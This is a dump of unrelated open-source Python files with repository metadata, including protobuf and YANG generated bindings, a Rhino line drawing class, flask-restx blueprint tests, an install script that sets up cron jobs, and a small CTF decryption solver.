Getter method for lsp_admin_group_include_any_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_extensive/output/lsp/show_mpls_lsp_extensive_info/show_mpls_lsp_sec_path_info/sec_path/lsp_sec_path_config_admin_groups/lsp_admin_group/lsp_admin_group_include_any/lsp_admin_group_include_any_group_id (uint32)
YANG Description: Include any admin group id
"""
return self.__lsp_admin_group_include_any_group_id
def _set_lsp_admin_group_include_any_group_id(self, v, load=False):
"""
Setter method for lsp_admin_group_include_any_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_extensive/output/lsp/show_mpls_lsp_extensive_info/show_mpls_lsp_sec_path_info/sec_path/lsp_sec_path_config_admin_groups/lsp_admin_group/lsp_admin_group_include_any/lsp_admin_group_include_any_group_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_admin_group_include_any_group_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_admin_group_include_any_group_id() directly.
YANG Description: Include any admin group id
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_admin_group_include_any_group_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_admin_group_include_any_group_id = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_admin_group_include_any_group_id(self):
self.__lsp_admin_group_include_any_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
lsp_admin_group_include_any_group_id = __builtin__.property(_get_lsp_admin_group_include_any_group_id, _set_lsp_admin_group_include_any_group_id)
_pyangbind_elements = {'lsp_admin_group_include_any_group_id': lsp_admin_group_include_any_group_id, }
| 57.295455 | 504 | 0.74838 | [
"Apache-2.0"
] | extremenetworks/pybind | pybind/slxos/v17r_1_01a/brocade_mpls_rpc/show_mpls_lsp_extensive/output/lsp/show_mpls_lsp_extensive_info/show_mpls_lsp_sec_path_info/sec_path/lsp_sec_path_config_admin_groups/lsp_admin_group/lsp_admin_group_include_any/__init__.py | 7,563 | Python |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: sprint.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from easy_work_service_sdk.model.topboard import product_basic_pb2 as easy__work__service__sdk_dot_model_dot_topboard_dot_product__basic__pb2
from easy_work_service_sdk.model.topboard import issue_basic_pb2 as easy__work__service__sdk_dot_model_dot_topboard_dot_issue__basic__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='sprint.proto',
package='topboard',
syntax='proto3',
serialized_options=_b('ZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboard'),
serialized_pb=_b('\n\x0csprint.proto\x12\x08topboard\x1a\x38\x65\x61sy_work_service_sdk/model/topboard/product_basic.proto\x1a\x36\x65\x61sy_work_service_sdk/model/topboard/issue_basic.proto\"\xca\x01\n\x06Sprint\x12\'\n\x07product\x18\x01 \x03(\x0b\x32\x16.topboard.ProductBasic\x12$\n\x06issues\x18\x02 \x03(\x0b\x32\x14.topboard.IssueBasic\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x12\n\ninstanceId\x18\x04 \x01(\t\x12\r\n\x05title\x18\x05 \x01(\t\x12\x0e\n\x06status\x18\x06 \x01(\t\x12\x0c\n\x04goal\x18\x07 \x01(\t\x12\x11\n\tstartTime\x18\x08 \x01(\t\x12\x0f\n\x07\x65ndTime\x18\t \x01(\tBDZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboardb\x06proto3')
,
dependencies=[easy__work__service__sdk_dot_model_dot_topboard_dot_product__basic__pb2.DESCRIPTOR,easy__work__service__sdk_dot_model_dot_topboard_dot_issue__basic__pb2.DESCRIPTOR,])
_SPRINT = _descriptor.Descriptor(
name='Sprint',
full_name='topboard.Sprint',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='topboard.Sprint.product', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='issues', full_name='topboard.Sprint.issues', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Sprint.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='topboard.Sprint.instanceId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='title', full_name='topboard.Sprint.title', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='topboard.Sprint.status', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='goal', full_name='topboard.Sprint.goal', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='startTime', full_name='topboard.Sprint.startTime', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='endTime', full_name='topboard.Sprint.endTime', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=141,
serialized_end=343,
)
_SPRINT.fields_by_name['product'].message_type = easy__work__service__sdk_dot_model_dot_topboard_dot_product__basic__pb2._PRODUCTBASIC
_SPRINT.fields_by_name['issues'].message_type = easy__work__service__sdk_dot_model_dot_topboard_dot_issue__basic__pb2._ISSUEBASIC
DESCRIPTOR.message_types_by_name['Sprint'] = _SPRINT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Sprint = _reflection.GeneratedProtocolMessageType('Sprint', (_message.Message,), {
'DESCRIPTOR' : _SPRINT,
'__module__' : 'sprint_pb2'
# @@protoc_insertion_point(class_scope:topboard.Sprint)
})
_sym_db.RegisterMessage(Sprint)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 46.699248 | 677 | 0.7564 | ["Apache-2.0"] | easyopsapis/easyops-api-python | easy_work_service_sdk/model/topboard/sprint_pb2.py | 6,211 | Python |
from abc import ABC, abstractmethod
from typing import Tuple, Dict
from kloppy.infra.utils import Readable
from kloppy.domain import Dataset
class TrackingDataSerializer(ABC):
@abstractmethod
def deserialize(
self, inputs: Dict[str, Readable], options: Dict = None
) -> Dataset:
raise NotImplementedError
@abstractmethod
def serialize(self, dataset: Dataset) -> Tuple[str, str]:
raise NotImplementedError
| 25.166667 | 63 | 0.719647 | ["BSD-3-Clause"] | FCrSTATS/kloppy | kloppy/infra/serializers/tracking/base.py | 453 | Python |
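A minimal sketch of what a concrete implementation of the TrackingDataSerializer interface above has to provide; the CSVTrackingSerializer name, the "raw_data" input key and the parse/build/format helpers are hypothetical, only the two abstract methods and their signatures come from the class itself.
class CSVTrackingSerializer(TrackingDataSerializer):
    """Illustrative subclass: both abstract methods must be overridden."""
    def deserialize(self, inputs: Dict[str, Readable], options: Dict = None) -> Dataset:
        raw = inputs["raw_data"].read()            # hypothetical input key
        frames = parse_csv_frames(raw, options or {})  # hypothetical parser
        return build_dataset(frames)               # hypothetical Dataset construction
    def serialize(self, dataset: Dataset) -> Tuple[str, str]:
        # e.g. return (metadata_csv, frames_csv)
        return format_metadata(dataset), format_frames(dataset)  # hypothetical formatters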
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import compas_rhino
from compas.utilities import iterable_like
from compas_rhino.artists._primitiveartist import PrimitiveArtist
__all__ = ['LineArtist']
class LineArtist(PrimitiveArtist):
"""Artist for drawing lines.
Parameters
----------
primitive : :class:`compas.geometry.Line`
A COMPAS line.
Notes
-----
See :class:`compas_rhino.artists.PrimitiveArtist` for all other parameters.
"""
def draw(self):
"""Draw the line.
Returns
-------
list
The GUIDs of the created Rhino objects.
"""
start = list(self.primitive.start)
end = list(self.primitive.end)
lines = [{'start': start, 'end': end, 'color': self.color, 'name': self.name}]
guids = compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
@staticmethod
def draw_collection(collection, names=None, colors=None, layer=None, clear=False, add_to_group=False, group_name=None):
"""Draw a collection of lines.
Parameters
----------
collection: list of compas.geometry.Line
A collection of ``Line`` objects.
names : list of str, optional
Individual names for the lines.
colors : color or list of color, optional
A color specification for the lines as a single color or a list of individual colors.
layer : str, optional
A layer path.
clear : bool, optional
Clear the layer before drawing.
add_to_group : bool, optional
Add the frames to a group.
group_name : str, optional
Name of the group.
Returns
-------
guids: list
A list of GUIDs if the collection is not grouped.
groupname: str
The name of the group if the collection objects are grouped.
"""
lines = [{'start': list(line[0]), 'end': list(line[1])} for line in collection]
if colors:
if isinstance(colors[0], (int, float)):
colors = iterable_like(collection, [colors], colors)
else:
colors = iterable_like(collection, colors, colors[0])
for line, rgb in zip(lines, colors):
line['color'] = rgb
if names:
if isinstance(names, basestring):
names = iterable_like(collection, [names], names)
else:
names = iterable_like(collection, names, names[0])
for line, name in zip(lines, names):
line['name'] = name
guids = compas_rhino.draw_lines(lines, layer=layer, clear=clear)
if not add_to_group:
return guids
group = compas_rhino.rs.AddGroup(group_name)
if group:
compas_rhino.rs.AddObjectsToGroup(guids, group)
return group
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
| 30.62037 | 123 | 0.566979 | ["MIT"] | KEERTHANAUDAY/compas | src/compas_rhino/artists/lineartist.py | 3,307 | Python |
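A short usage sketch for the artist above, assuming a Rhino session with compas installed; the layer name and coordinates are made up, and the attributes are set directly since draw() only relies on self.color, self.name and self.layer.
from compas.geometry import Line
from compas_rhino.artists import LineArtist

lines = [Line([0, 0, 0], [1, 0, 0]), Line([0, 0, 0], [0, 1, 0])]

# Draw one line with its own artist.
artist = LineArtist(lines[0])
artist.color = (255, 0, 0)
artist.layer = "Example::Lines"
artist.draw()

# Or draw the whole collection in one call, grouped under a single name.
LineArtist.draw_collection(lines, colors=(0, 0, 255), layer="Example::Lines",
                           clear=True, add_to_group=True, group_name="axes")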
# Copyright (C) 2021 Xilinx, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is used to configure your project.
# Read more about the various options under:
# http://setuptools.readthedocs.io/en/latest/setuptools.html#configuring-setup-using-setup-cfg-files
# -*- coding: utf-8 -*-
"""
Setup file for logicnets.
Use setup.cfg to configure your project.
This file was generated with PyScaffold 3.2.3.
PyScaffold helps you to put up the scaffold of your new Python project.
Learn more under: https://pyscaffold.org/
"""
import sys
from pkg_resources import VersionConflict, require
from setuptools import setup
try:
require('setuptools>=38.3')
except VersionConflict:
print("Error: version of setuptools is too old (<38.3)!")
sys.exit(1)
if __name__ == "__main__":
setup(use_pyscaffold=True)
| 32.309524 | 100 | 0.733972 | ["Apache-2.0"] | Ali-Homsi/githubrepo | setup.py | 1,357 | Python |
# Copyright (C) 2017-2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
class Device(object):
def __init__(self, platform_device):
self.platform_device = platform_device
self.listening_socket = None
def listening_port(self):
if not self.listening_socket:
return None
return self.listening_socket.getsockname()[1]
def install_app(self, app_path, env=None):
return self.platform_device.install_app(app_path, env)
def install_dylibs(self, path_to_dylibs):
if hasattr(self.platform_device, 'install_dylibs'):
return self.platform_device.install_dylibs(path_to_dylibs=path_to_dylibs)
return True
def launch_app(self, bundle_id, args, env=None):
return self.platform_device.launch_app(bundle_id, args, env)
def prepare_for_testing(self, ports_to_forward, test_app_bundle_id, layout_test_directory):
if not self.listening_socket:
self.listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listening_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listening_socket.bind(('127.0.0.1', 0))
if hasattr(self.platform_device, 'prepare_for_testing'):
self.platform_device.prepare_for_testing(
ports_to_forward=ports_to_forward + [self.listening_port()],
test_app_bundle_id=test_app_bundle_id,
layout_test_directory=layout_test_directory,
)
def finished_testing(self):
if hasattr(self.platform_device, 'finished_testing'):
self.platform_device.finished_testing()
self.listening_socket = None
def symbolicate_crash_log_if_needed(self, path):
if hasattr(self.platform_device, 'symbolicate_crash_log_if_needed'):
return self.platform_device.symbolicate_crash_log_if_needed(path)
return self.filesystem.read_text_file(path)
def release_worker_resources(self):
if hasattr(self.platform_device, 'release_worker_resources'):
return self.platform_device.release_worker_resources()
return None
@property
def executive(self):
return self.platform_device.executive
@property
def filesystem(self):
return self.platform_device.filesystem
@property
def user(self):
return self.platform_device.user
@property
def platform(self):
return self.platform_device.platform
@property
def workspace(self):
return self.platform_device.workspace
@property
def udid(self):
return self.platform_device.udid
@property
def device_type(self):
return self.platform_device.device_type
@property
def build_version(self):
return self.platform_device.build_version
def __nonzero__(self):
return self.platform_device is not None
def __eq__(self, other):
return self.udid == other.udid
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return u'{}'.format(self.platform_device)
def __hash__(self):
return hash(self.udid)
| 36.5 | 95 | 0.715922 | ["BSD-2-Clause"] | jacadcaps/webkitty | Tools/Scripts/webkitpy/port/device.py | 4,453 | Python |
out = "281 547 54 380 392 98 158 440 724 218 406 672 193 457 694 208 455 745 196 450 724".split(" ")
out = [int(x) for x in out]
exec('def f(x):'+'yield((x:=-~x)*x+-~-x)%727;'*100)
for i in range(727):
g=f(i)
a = (list([*map(lambda c:c^next(g),out)]))
if all([x < 128 for x in a]):
print(i)
print("".join([chr(x) for x in a]))
| 28.583333 | 100 | 0.559767 | ["MIT"] | NoXLaw/RaRCTF2021-Challenges-Public | crypto/minigen/solve.py | 343 | Python |
import datetime
from datetime import timedelta
import csv
from module.stock import Stock, Market
# Historic Files
DAX = 'DAX.csv'
DOW = 'Dow.csv'
FTSE = 'FTSE.csv'
# Output File
OUTPUT = 'output.txt'
def import_csv(file_name):
data = []
with open(file_name) as file:
reader = csv.reader(file)
data = list(reader)
return(data)
# Import historic stock performance
Dax_data = import_csv(DAX)
Dow_data = import_csv(DOW)
Ftse_data = import_csv(FTSE)
Ftse = Market('FTSE', Ftse_data)
Ftse.p.sort(key=lambda x: x.d, reverse=False) # Sorts into date order
vanguard = Stock('Vanguard', 1, 100000) # Name, price, units
vanguard.sim(Ftse, datetime.date(2007, 1, 1), datetime.date(2012, 1, 1))
print(vanguard.v)
''' Simulation '''
'''for i in range(0,1000):
Ftse = Market('Random', [])
Ftse.p.sort(key=lambda x: x.d, reverse=False)
vanguard = Stock('Vanguard', 1, 100000) # Name, price, units
vanguard.sim(Ftse, datetime.date(2019, 2, 1), datetime.date(2022, 1, 1))
print(vanguard.v)
if(vanguard.v > 100000):
break
'''
| 25.761905 | 76 | 0.666359 | ["MIT"] | Mooseymax/Market_Simulator | d.py | 1,082 | Python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import flask
from flask import Blueprint, request
import flask_restx as restx
# Add a dummy Resource to verify that the app is properly set.
class HelloWorld(restx.Resource):
def get(self):
return {}
class GoodbyeWorld(restx.Resource):
def __init__(self, err):
self.err = err
def get(self):
flask.abort(self.err)
class APIWithBlueprintTest(object):
def test_api_base(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
app.register_blueprint(blueprint)
assert api.urls == {}
assert api.prefix == ''
assert api.default_mediatype == 'application/json'
def test_api_delayed_initialization(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api()
api.init_app(blueprint)
app.register_blueprint(blueprint)
api.add_resource(HelloWorld, '/', endpoint="hello")
def test_add_resource_endpoint(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
view = mocker.Mock(**{'as_view.return_value.__name__': str('test_view')})
api.add_resource(view, '/foo', endpoint='bar')
app.register_blueprint(blueprint)
view.as_view.assert_called_with('bar', api)
def test_add_resource_endpoint_after_registration(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
app.register_blueprint(blueprint)
view = mocker.Mock(**{'as_view.return_value.__name__': str('test_view')})
api.add_resource(view, '/foo', endpoint='bar')
view.as_view.assert_called_with('bar', api)
def test_url_with_api_prefix(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint, prefix='/api')
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint)
with app.test_request_context('/api/hi'):
assert request.endpoint == 'test.hello'
def test_url_with_blueprint_prefix(self, app):
blueprint = Blueprint('test', __name__, url_prefix='/bp')
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint)
with app.test_request_context('/bp/hi'):
assert request.endpoint == 'test.hello'
def test_url_with_registration_prefix(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint, url_prefix='/reg')
with app.test_request_context('/reg/hi'):
assert request.endpoint == 'test.hello'
def test_registration_prefix_overrides_blueprint_prefix(self, app):
blueprint = Blueprint('test', __name__, url_prefix='/bp')
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint, url_prefix='/reg')
with app.test_request_context('/reg/hi'):
assert request.endpoint == 'test.hello'
def test_url_with_api_and_blueprint_prefix(self, app):
blueprint = Blueprint('test', __name__, url_prefix='/bp')
api = restx.Api(blueprint, prefix='/api')
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint)
with app.test_request_context('/bp/api/hi'):
assert request.endpoint == 'test.hello'
def test_error_routing(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint="hello")
api.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
app.register_blueprint(blueprint)
with app.test_request_context('/hi', method='POST'):
assert api._should_use_fr_error_handler() is True
assert api._has_fr_route() is True
with app.test_request_context('/bye'):
api._should_use_fr_error_handler = mocker.Mock(return_value=False)
assert api._has_fr_route() is True
def test_non_blueprint_rest_error_routing(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint="hello")
api.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
app.register_blueprint(blueprint, url_prefix='/blueprint')
api2 = restx.Api(app)
api2.add_resource(HelloWorld(api), '/hi', endpoint="hello")
api2.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
with app.test_request_context('/hi', method='POST'):
assert api._should_use_fr_error_handler() is False
assert api2._should_use_fr_error_handler() is True
assert api._has_fr_route() is False
assert api2._has_fr_route() is True
with app.test_request_context('/blueprint/hi', method='POST'):
assert api._should_use_fr_error_handler() is True
assert api2._should_use_fr_error_handler() is False
assert api._has_fr_route() is True
assert api2._has_fr_route() is False
api._should_use_fr_error_handler = mocker.Mock(return_value=False)
api2._should_use_fr_error_handler = mocker.Mock(return_value=False)
with app.test_request_context('/bye'):
assert api._has_fr_route() is False
assert api2._has_fr_route() is True
with app.test_request_context('/blueprint/bye'):
assert api._has_fr_route() is True
assert api2._has_fr_route() is False
def test_non_blueprint_non_rest_error_routing(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint="hello")
api.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
app.register_blueprint(blueprint, url_prefix='/blueprint')
@app.route('/hi')
def hi():
return 'hi'
@app.route('/bye')
def bye():
flask.abort(404)
with app.test_request_context('/hi', method='POST'):
assert api._should_use_fr_error_handler() is False
assert api._has_fr_route() is False
with app.test_request_context('/blueprint/hi', method='POST'):
assert api._should_use_fr_error_handler() is True
assert api._has_fr_route() is True
api._should_use_fr_error_handler = mocker.Mock(return_value=False)
with app.test_request_context('/bye'):
assert api._has_fr_route() is False
with app.test_request_context('/blueprint/bye'):
assert api._has_fr_route() is True
| 42.447853 | 81 | 0.655731 | ["BSD-3-Clause"] | SteadBytes/flask-restx | tests/legacy/test_api_with_blueprint.py | 6,919 | Python |
#!/usr/bin/python3
import importlib
import os
import getpass
import pip
from crontab import CronTab
if int(pip.__version__.split('.')[0])>9:
from pip._internal import main as pipmain
else:
from pip import main as pipmain
def check_modules():
packages = {"docx" : "python-docx",
"googleapiclient" : "google-api-python-client",
"google_auth_oauthlib" : "google_auth_oauthlib",
"crontab" : "python-crontab"
}
for ky, vl in packages.items():
spam_spec = importlib.util.find_spec(ky)
if spam_spec is None:
pipmain(['install', vl])
class useCronTab(object):
def __init__(self):
usr_name = getpass.getuser()
self.my_cron = CronTab(user=usr_name)
abs_path = os.path.dirname(os.path.realpath(__file__))
self.commnd = abs_path + "src/agenda "
def set_job(self, date, featur):
job = self.my_cron.new(command=self.commnd+featur)
job.setall(date)
def __del__(self):
self.my_cron.write()
def import_package():
import py_compile
py_modules = ["cal_setup.py",
"classEvent.py",
"datesGenerator.py",
"intrctCalendar.py",
"intrctDrive.py",
"readDocxFile.py",
"getNotification.py"
]
for pckg in py_modules:
py_compile.compile(pckg)
if __name__ == '__main__':
abs_path = os.path.dirname(os.path.realpath(__file__))
os.chdir(abs_path)
print("Installing missing modules")
check_modules()
print("Compiling .py files")
import_package()
features = {"today" : "-d",
"tomorrow" : "-t",
"week" : "-w",
"month" : "-m"
}
automatize = input("Do you want to automitize executation? [y]/[n]: ")
cron = useCronTab()
while automatize == 'y':
feature = input("Dates to update automaticaly? [today]/[tomorrow]/[week]/[month]: ")
print("\n Select the day: \n"
+ "-----------------------\n"
+ "dow: day of week (0-6 Sun-Sat)\n"
+ "mon: Month (1-12 Jan-Dec)\n"
+ "dom: day of month (1-31)\n"
+ "hh: hour (00-23)\n"
+ "mm: minute (00-59)\n"
+ "Use * for any\n")
date = input("Select date [mm hh dom mon dow]: ")
cron.set_job(date, features[feature])
automatize = input("Any more automatization? [y]/[n]:")
del cron
| 24.018692 | 92 | 0.538521 | ["Apache-2.0"] | Jaimedgp/Master-Schedule | src/install.py | 2,570 | Python |
# pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from collections import namedtuple
from . import target_kinetis
FamilyInfo = namedtuple("FamilyInfo", "vendor matches klass")
## @brief Lookup table to convert from CMSIS-Pack family names to a family class.
#
# The vendor name must be an exact match to the 'Dvendor' attribute of the CMSIS-Pack family
# element.
#
# At least one of the regexes must match the entirety of either the CMSIS-Pack 'Dfamily' or
# 'DsubFamily' (if present) attributes.
FAMILIES = [
FamilyInfo("NXP", [re.compile(r'MK[LEVWS]?.*')], target_kinetis.Kinetis),
]
| 35.529412 | 92 | 0.740066 | ["Apache-2.0"] | ARMmbed/pyOCD-Samsung | pyocd/target/family/__init__.py | 1,208 | Python |
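A small sketch of how the FAMILIES table above could be consulted; the find_family_class helper is not part of pyOCD, it only spells out the matching rule from the comment (exact vendor match, plus a regex that matches the whole family or sub-family string).
def find_family_class(vendor, family, subfamily=None):
    """Return the first matching family class, or None (illustrative helper)."""
    for info in FAMILIES:
        if info.vendor != vendor:
            continue
        for pattern in info.matches:
            if pattern.fullmatch(family) or (subfamily and pattern.fullmatch(subfamily)):
                return info.klass
    return None

# A hypothetical Kinetis family string resolves to the Kinetis class:
# find_family_class("NXP", "MKL25Z4") -> target_kinetis.Kinetis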
import argparse
import RDT
import time
import rdt_3_0
def makePigLatin(word):
m = len(word)
vowels = "a", "e", "i", "o", "u", "y"
if m < 3 or word == "the":
return word
else:
for i in vowels:
if word.find(i) < m and word.find(i) != -1:
m = word.find(i)
if m == 0:
return word + "way"
else:
return word[m:] + word[:m] + "ay"
def piglatinize(message):
essagemay = ""
message = message.strip(".")
for word in message.split(' '):
essagemay += " " + makePigLatin(word)
return essagemay.strip() + "."
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Pig Latin conversion server.')
parser.add_argument('port', help='Port.', type=int)
args = parser.parse_args()
timeout = 5 # close connection if no new data within 5 seconds
time_of_last_data = time.time()
rdt = rdt_3_0.RDT('server', None, args.port)
while (True):
# try to receiver message before timeout
# msg_S = rdt.rdt_2_1_receive()
msg_S = rdt.rdt_3_0_receive()
if msg_S is None:
if time_of_last_data + timeout < time.time():
break
else:
continue
time_of_last_data = time.time()
# convert and reply
rep_msg_S = piglatinize(msg_S)
print('Converted %s \nto \n%s\n' % (msg_S, rep_msg_S))
# rdt.rdt_2_1_send(rep_msg_S)
rdt.rdt_3_0_send(rep_msg_S)
rdt.disconnect()
| 27.410714 | 80 | 0.565472 | ["Apache-2.0"] | AlexHarry17/CSCI466Project2 | submission_files/server_3_0.py | 1,535 | Python |
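For reference, the conversion above behaves like this when called directly (outputs computed from the functions as written, no RDT connection involved):
>>> piglatinize("hello world.")
'ellohay orldway.'
>>> piglatinize("the answer is yes.")
'the answerway is yesway.'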
# coding=utf-8
# --------------------------------------------------------------------------
